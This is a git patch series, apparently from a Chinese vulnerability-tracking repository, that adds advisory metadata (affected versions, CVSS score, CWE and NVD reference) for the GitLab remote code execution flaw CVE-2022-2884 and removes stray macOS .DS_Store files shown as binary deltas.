GitLab中出现的漏洞,允许经过身份认证的用户通过从GitHub API导入实现远程代码执行。 + scope-of-influence: + 11.3.4 <= GitLab(CE/EE)< 15.1.5 + 15.2 <= GitLab(CE/EE)< 15.2.3 + 15.3 <= GitLab(CE/EE)< 15.3.1 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-2884 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2022-2884 + cwe-id: CWE-78 + cnvd-id: None + kve-id: None + tags: Remote Code Execution,cve2022,gitlab diff --git a/openkylin_list.yaml b/openkylin_list.yaml index f822acc2..8cc6dcc0 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -30,6 +30,7 @@ cve: gitlab: - CVE-2021-22205 - CVE-2022-1162 + - CVE-2022-2884 confluence: - CVE-2019-3396 - CVE-2021-26084 -- Gitee From f3aeb40f4e6977285faf08f2d0e7f60bac587300 Mon Sep 17 00:00:00 2001 From: shizhongli Date: Mon, 13 Mar 2023 10:50:16 +0800 Subject: [PATCH 2/7] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-2884?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .DS_Store | Bin 8196 -> 8196 bytes cve/.DS_Store | Bin 8196 -> 8196 bytes cve/apache/.DS_Store | Bin 0 -> 6148 bytes cve/apache/2021/.DS_Store | Bin 0 -> 6148 bytes cve/gitlab/.DS_Store | Bin 6148 -> 8196 bytes cve/gitlab/2021/.DS_Store | Bin 0 -> 6148 bytes cve/gitlab/2022/.DS_Store | Bin 8196 -> 10244 bytes cve/gitlab/2022/yaml/CVE-2022-2884.yaml | 2 +- 8 files changed, 1 insertion(+), 1 deletion(-) create mode 100644 cve/apache/.DS_Store create mode 100644 cve/apache/2021/.DS_Store create mode 100644 cve/gitlab/2021/.DS_Store diff --git a/.DS_Store b/.DS_Store index e8dee0a9e293190936798406b3cd85f3af26f472..1b951b740c22ce726e56b78385902bf572adb7b3 100644 GIT binary patch delta 167 zcmZp1XmQxEM}WiBz(7aA#LQ&!5rII)&6C9hl{iI3#l%I$B&EbAI||;Bj>t^T&kN41 zN{tubFV4s>_XKhSic-rmQ_Ck?2&oBk3NUhpq!(qTC_4l&fC1;^Dj`L40Y)W8ZAKGD wTSj|E4@OT$Z$=-+K*lJD5++6n%^(A%p%i2E<|{%!7&jl}abw=hF7cNg0ABJV#{d8T delta 173 zcmZp1XmQxEM}Wh`z)(lQ#Kd&+5rII)eUrrml{m#j#U(_=rNm_>I||;Bju+rB&d4wK zOwP{>C`v8MOf8Sd1hRuOt5PRh2&u^^JLoWg0jB^XXGnTcW(udWLjXi*a-oo-r6i*g yqc)=nqb;L7qX%OkV-RBqV<=-3V>Cn!6C;FXkcHAviZNyLNueK%o6m??a037XuOlD; diff --git a/cve/.DS_Store b/cve/.DS_Store index f7ef84ea1b5e356f786ea3152c79185e75573230..923210607e01907b7468fed057e585bead74fe48 100644 GIT binary patch delta 76 zcmZp1XmOa}&nU7nU^hRb$YdS?eO@+(M1}$&PG-npNZl+Ubc9hHNuVsaC@&{JFP(vb WfpN2iz!TQZ>=NHtHVX-}GXntjx)Zkm delta 41 xcmZp1XmOa}&nUDpU^hRb&}1F~{mp7Z4_P-hyk^|YF7b_J^9wO~#*Gax7y%~O4%`3$ diff --git a/cve/apache/.DS_Store b/cve/apache/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..277157918816b6de5c06fa80f9bb919943ec1ec5 GIT binary patch literal 6148 zcmeHK&2G~`5S~c`OyaeJA-~|xO{)Cc*9zhiCNVDJU?9ABvS>7K2z*4`x24Dd|id0~7j+)~v^z0>o(C@vO1TNWl}l9w*erqXlsSFT=LuriBFndMA2o6TL%=2mhyo7R%k zau2#8?+5LN+~;A*@3Xyb=(TITmg@!Gdd%L$HSdHqt;LDZZPtEy=Gr;#QOxq0Lza6S zG8V{sl};yOalL6RL~h7^zse&o_IS|vWwh}kdd-i@F*_^=9ZpXict)RL&4q}8F!RnK|vV+ zX$#Xkf{Jv(u4-orR$&94!7d!Y3A}}Oa0(ybBYc7{@C|2i1#jaj-p2>Hj!&?RTlf^8 zu22f8pNTys%-wFz}}t5bHyp zRG_VKs8B8))W|CUp*TiJAzL2(3G>21XlooQBo7IyR6>=C`ig=2=71`l#%&!xRH)Jc z<&&w7elqGC3hIjo=4CjbtGKCtw9ZN%O#WzT$&{$p=gto?^Lh_K9gMg&LG=_n{%D@i> CHlfP^ literal 0 HcmV?d00001 diff --git a/cve/apache/2021/.DS_Store b/cve/apache/2021/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..1a1f4266912cc3a08d440897c76dbf7affd8435a GIT binary patch literal 6148 zcmeHKJxc>Y5PhRp1O!QGBkUhgyeQb7F)6GA)*1zyGY5i#-TotgqQ2P~!84a8g-DnQ zyKi=9-tOLm><0juzCPB#7{G`{QPdeQ?H&y6d2&URGR6dFn4rc9E(Qkrk6pU!4z^+kDHI3=c3A=49}5yE=FIk z$;wHNjbk=sgeFEM8ddy>Ax39^^1Q||8yX$rj}P&gzaKABX6N{+q(d6Rs6&BJps&Eb zHOG4X&-s@beB}2j(Fz4ZfgMvos@Y;Td@%-E&*)lK5|ro c7EkIkuW`(VI*RreIx#K+MUbdMfj>~-3#_U&ga7~l literal 0 HcmV?d00001 diff --git a/cve/gitlab/.DS_Store b/cve/gitlab/.DS_Store index 0b72f7195dfee94607f8ed7c4a8d622fc0354da1..1c6f2fd87d2ba37e59c40a64ae512bbcfe580419 100644 GIT binary patch delta 134 zcmZoMXmOBWU|?W$DortDU;r^WfEYvza8E20o2aMA$i6XPH}hr%jz7$c**Q2SHn1?V zPv&7UW;EPv!Fr03*RU+OC@&{JFCApeW)qgn%o`hInFN`ETp*C(1`@6y(>4ood}p4_ VFXB1bpNE5k5n>U;=6Iet%m4=M8Z7_- delta 104 zcmZp1XfcprU|?W$DortDU=RQ@Ie-{Mvv5r;6q~50$jG`eU^g=(>tr4Qw&zl9=5LPXa26gGT;8a=yiRdq zk$6mc|A!Q^XwiTH)Sv_Ig}AfJ;+#gmtLov0de?P=Fq{2iSs0m#Ub#9Oi_gtpyS}h! zC6<;GD~V(>nYxiot)^~Ot>t>HaoqNK&ueaSm-~6Q#}3=R(=2yu4aaL&LiRQ+JEyE_ zEnNuRWzAP3*WRE@F)Jg7Ece7`%#-zstyaLoO4V8n8a{X35)Yiv;oiY-y$46Z8-7v< zS*PH&IK8p&u#;j}ga!M|4+tmnD=*zzow-FX&%=;+4r;z%^V%#w5Rsx$k;pQ#$9DtkWmIe+`{;tpdy~JOWGNOH5#nvG_c2T3h&@OoWV!<1fSt6 ze8*W_#XGo$5AYFg;8QH%4nD&dxT~@ww46)1tx*FWlJRTE`(@vAxz{G&dHi^|d75el z^q|G&r}`_+#~B6;1OI{nu|A|p1=<>i3gyy4jl2R7ierQnvc)k$H4YW3bU=OiK>cRaHx!g_r}}9b4rnVhtzp10FwVe?dbGs;zkT`r ze>}-N83qgk{}lrm-70V8>6i50I`MO2uT7J_CKV#$h6-g0HF`UihS-X4l1ibzv@i&5 UjYEaxAu$I5NrPz&1Amo)pC7iQ!2kdN literal 0 HcmV?d00001 diff --git a/cve/gitlab/2022/.DS_Store b/cve/gitlab/2022/.DS_Store index 33f547c6fcd661b350e1f2b39c5f90fda4190e72..df534479bffaabfe8f192f0daa911a7d3c60a52c 100644 GIT binary patch delta 167 zcmZp1XbF&DU|?W$DortDU{C-uIe-{M3-C-V6q~50$jHAjU^hP_|KvnL@yW^pR_ulh zh74v5Mw{yeuQ3WkIc32`c{%xc=|FvqK!tLfQv^=10971f+^j76glS`g9*ZC|P!b3f txPgQ#$o!3k-1v0&xe+d~eO|BQb2mlPGBB%fW delta 123 zcmZn(XmOBWU|?W$DortDU;r^WfEYvza8E20o2aMA$g?qEH$NlKWM3ii$*}_LleGkl zC)W$JZ_XAv!Ls?E#BC-)W}tE)kl+Rqt{|No3%@f@=2r>iV1$^*Fgc!QDsx_b*JKZ2 NdB*O|pCq0z0RZho8z2Ax diff --git a/cve/gitlab/2022/yaml/CVE-2022-2884.yaml b/cve/gitlab/2022/yaml/CVE-2022-2884.yaml index 07aab66b..8f0abbea 100644 --- a/cve/gitlab/2022/yaml/CVE-2022-2884.yaml +++ b/cve/gitlab/2022/yaml/CVE-2022-2884.yaml @@ -18,4 +18,4 @@ info: cwe-id: CWE-78 cnvd-id: None kve-id: None - tags: Remote Code Execution,cve2022,gitlab + tags: RemoteCodeExecution,cve2022,gitlab -- Gitee From 2401e370b4f9217f3e1aad0b1db144d69ebedc6e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E4=B8=96=E4=B8=AD?= Date: Mon, 13 Mar 2023 02:55:24 +0000 Subject: [PATCH 3/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?gitlab/.DS=5FStore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/gitlab/.DS_Store | Bin 8196 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/gitlab/.DS_Store diff --git a/cve/gitlab/.DS_Store b/cve/gitlab/.DS_Store deleted file mode 100644 index 1c6f2fd87d2ba37e59c40a64ae512bbcfe580419..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8196 zcmeHMUr!T35TAi+uOf2%DMIw2u`ebNEw!2$V<-iq4H}RVECH-{?NKirx6R#^3WTK3 z`s4@jGw|SxiC@4^;G6Ly=oc_LyL(qn3$MoDPO|%(o1NM1{&sSAa|Hk_G;1>e69Ax5 zXp4nWqQ=a>B zRP~Ah#lU~b0KY$^sBz4P*p?`69n^^ufG|d8A*72}f5H?u5avT{OC$>k%1}ZXieZU? zVda1_oW}E^e_Nsq2NWyQJmJb1Rwx)29+(pDfO(0kR}3fydKuugdknIWp*GW1zt7Rw zjh{k9V8_p{?lokckMGTfWBWlS^HtZeuRnI~d|XRh7`QliX-FR)866%QP9~G%my_d@ z<5w#BsA*Jp>K<#lwRz?+ui!MTjk;&oN)4lGyY+Hly$VY9fmP8*x?ESR+VkJ0)%^zf zjQuu<=^lEP<%;>1wzqvNC|C3$zv?l^S!TW+*vwu3V|0Dff5}?Kz}hXk+l*G+v#r)r zgS+`_mgf`p#Fw`m!?c_wx4?pc?XDZ1XSj8%u+KgDY*pqidlsLmY?IFSlAir8c~9pT zBjvhObVy4DAfaPol~a*O=a)mH22(HxPhbsp-~isjJ2-}q@Cm-aH~4{ZoWyH5g*m*B zv-k*$xQLJODXz%qzVJ>7SED5);s#;oDECU9>oB)YHtrwUvt6lhOk*ddLe^~gVJg6f zC>1_qmj9;eKt2B7{0ojuVP Date: Mon, 13 Mar 2023 02:55:42 +0000 Subject: [PATCH 4/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20.DS?= =?UTF-8?q?=5FStore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .DS_Store | Bin 8196 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 .DS_Store diff --git a/.DS_Store b/.DS_Store deleted file mode 100644 index 1b951b740c22ce726e56b78385902bf572adb7b3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8196 zcmeHM&2AG(5UxrBu?egvBn|;BD}ygcpb#J+A%t+8M2iJ%LL7yJ0A|MSm?7hCYi5!V zqDVf&i3i{fkT`Hb;stmDZfGB2_qvBwsQxkdhX{!SLZVyh{<^EHs;j@Azp?=U^Xrv! z0HXkqpeoTBpyn$@&db_WdW_@{A(B0avKI)CMoyQm6<7u=1C{~HfMvik@N+Og?`&BT zd%XActZgj=mVsZA0r`B$P?eZ7*wCmR9n`24fUu9ms!(5j{1axRfG}sUp^+q1P@58J zQ#2_Cn%n`kInC#cenX=+2UIJQAG0!=3LITS%KCn7)g z1z&ENUA`9)%Y~TL3Vc=2iW|i6Y+b5Fi!6)?yX=?l2d>A0S)LbhENaVc7`nX5@>@%O zS#TYBO1Y)sT*#!$?6rS2kJ;RfX6KadIFQvHfTV-T1xZCVH>YJudbpp4Nw@`zum(@z z1-yjU@DAR?NB9T+$9{D1B%a0zyo%TGIu`H--o)E@SDW`V5Ayfs5*l%Z&>ZAOG30^Z zRgy^U{ZIi09{At_@3^pE(|qfN-AB5DZh@#>507`~9VKrZR!KL68u^WBEJ#vT`%DM9E!?g?;}krfp*x_-+PzwdLpl;mqE@|9`iCYiJp;4E+2I zVBd6cI!|#nzq2|+mbrF@>O-osNWF$eWkQWg#|c$BPWbr`L+WQpRodhXHZ+oiiv1x# M(O?_Pzz=2M6OS}fLI3~& -- Gitee From ac191cebc75cceff84b1e8363bfa74487448b99e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E4=B8=96=E4=B8=AD?= Date: Mon, 13 Mar 2023 02:55:58 +0000 Subject: [PATCH 5/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?.DS=5FStore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/.DS_Store | Bin 8196 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/.DS_Store diff --git a/cve/.DS_Store b/cve/.DS_Store deleted file mode 100644 index 923210607e01907b7468fed057e585bead74fe48..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8196 zcmeHM-EJF26h4!r{;3pdg89K-m!Mq zN!loqui=UZ;0=&^!3`2Gz!PwXcm%lR0>L*k>t=UNB`&Hez>G9=CbQo+GyCm1vpyRl zV$D(SI?*x_l~AR%Dro+u$m_CBm6>E@5te~Z^pJSV7p~(AX9{fwi~>dhqkvJsC}0#g z4GQ3$ElcSc?|psMv_=7=!2ePKc|O!orEMg3tgSja(5Msub`Ha;ppQI2acYTeBzCN= zqGC>+J+Oqzk`#k!I@jLf@+u{CN&=hej2HSQR+CiT;A4#N~%@x6V$mL8O z4}Ezr^_#yb38~(=GwHmcI~LV-hp23^@}`ucTyLx=gC)9x2k{wg(H=dfujw0lLO;-t z^fUcRf3PCE#9n7t*ed&g-DIDz7Q4efWuLPR&7Mh4OnP;)gtlx4HuE_5+hO2~ppS9M znNPa~y@?&HQ;XWDozzDj=_F53(@s*!F(VS>QRwg-^}@`xLfM9>tj5CMUa>8F|m?J19^J>l{Rho749bH~)zxPF^fkO847% z6pw>isNNU_W~H z_y1G2YqK4rfKlLiD!}G$w{JHw*H9mz$|7-NZ50KLO2=VUIu85vABO1H i0F|6ZV#nHI1m%T)2>9>(bT{w+lf2Zt|5Y^o^X4xlA*`YR -- Gitee From 2896eb5d2b099a29d503b6b521c9f966bde5ccee Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E4=B8=96=E4=B8=AD?= Date: Mon, 13 Mar 2023 02:56:28 +0000 Subject: [PATCH 6/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?gitlab/2022/.DS=5FStore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/gitlab/2022/.DS_Store | Bin 10244 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/gitlab/2022/.DS_Store diff --git a/cve/gitlab/2022/.DS_Store b/cve/gitlab/2022/.DS_Store deleted file mode 100644 index df534479bffaabfe8f192f0daa911a7d3c60a52c..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 10244 zcmeHMPfrs;6n_I%wgR&JDM<9Nu@@6i+ggam7;1qiK?72PAYk3LOWCm9X?C|D5RzWi zlOMouVB*1pCSE=G3A`CTf+n5~zM0t;DAI(31Z7?`^Lsn{-fZW$?@cqW06>zZTogb9 z00kREwFSFB2)obP0cr3@+7Jo)1H>SLEe2Ns=awQFkPJu$BmC>9#xUVySs>p!u;WJn!~hO+K^@Nl+(+{<;bU1Kcf~oy>4EsJ#6MyX z;g0t;W{#Nfu`E!y0}<{({3jFtghKe!(NE*%KoSCFFBy;w9Ato<-CJQ8W?&Rg?R(Gf zQ5b~Sm_@T0i)PS@CDvVR*LJv|R@c+at`>zSd7mj-rt3u_+p0<$8Uts}HYve#%`L6x z+tl`s&i1bMP$<;h6YB2mzL-`!GkSI<@6eK+8>SX@l2*x>&pT!=Rn)VlouBoL=U&R( zFw$yAjp>w;d%8O`y%{tVwCaG(BCbj4G+?`u+ zm+9J=XB5WlC5lg6HI222A~SPm497)0;6J-)=^4YCu#?pDXkkuw9No?v$#rJQX3J80 z(lOXfvnJ|nE#aXboKOfS#w*Gdp{NiR3P4aL!D&WCFr1k52NmeU*YXfw;0kQOYj^|i z;1hg-Z}1&{ktWhhE|WeICwIsYxlhK(IC(%GktyNb;P0kzsqzScWFE0jSgfWT+oEVhYJjdAe6}le#m{ zuBIuqG8J9V%pk=W0mIbxbkjB*?qKE&G+B6T+Bv$GWMSrV-;}ta1eIV~?b+PCH5lpF zB3u2M(4vunfvv5e5(;0xJ(XUu3O0R#3qTwLOe50BS55PL;PylOxKI2}q{|BLJ zwZ_~?Z5{-& zlMF}(Bm$pi!(;WA*>h!~g$3HGIg0N(N3N10*n#8cE{HD}{_&5?HNW!}bgt z6J}Qy$X&4G<#ijDj^_m|9E+gN1@#0|5X%BlLplCG1O8rxOrHOFoj{)dPk1@| EH&uNAfdBvi -- Gitee From b11cdbdf61c4550315b6629bcb6849cdc59c2e79 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E4=B8=96=E4=B8=AD?= Date: Mon, 13 Mar 2023 02:56:36 +0000 Subject: [PATCH 7/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?gitlab/2022/CVE-2022-2884/.DS=5FStore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/gitlab/2022/CVE-2022-2884/.DS_Store | Bin 6148 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/gitlab/2022/CVE-2022-2884/.DS_Store diff --git a/cve/gitlab/2022/CVE-2022-2884/.DS_Store b/cve/gitlab/2022/CVE-2022-2884/.DS_Store deleted file mode 100644 index 4d42217d930f6a3fb381a07da5d2c03bbb372069..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKyH3ME5S)b+K{PIDknRVFAfiZVf>Th?fJBXwltD?8g3cWUzrsJl?1P76AyHAl zuC+V2cRN0L3hx~NnQoV7Km}k(SHzQszUjJp&-P+QQS2RKoMO!9g#I&AZiP$SVP>pP z{sa@8V}uPJuU6~De6^liE##Q^@*2kR0dB~?K!a=I2oG59FrIf9Ow&?MV673;v((S98adVJUQfub76c9$TQ$m_t?kt;NDD$%JD zR}67F=S$Spfvuy{A+|H$6FW=XP{elUe6ey!?U*qYNCmnI?0Z^i|DVynx&L=bnWX}$ zz@Jh;2F-0V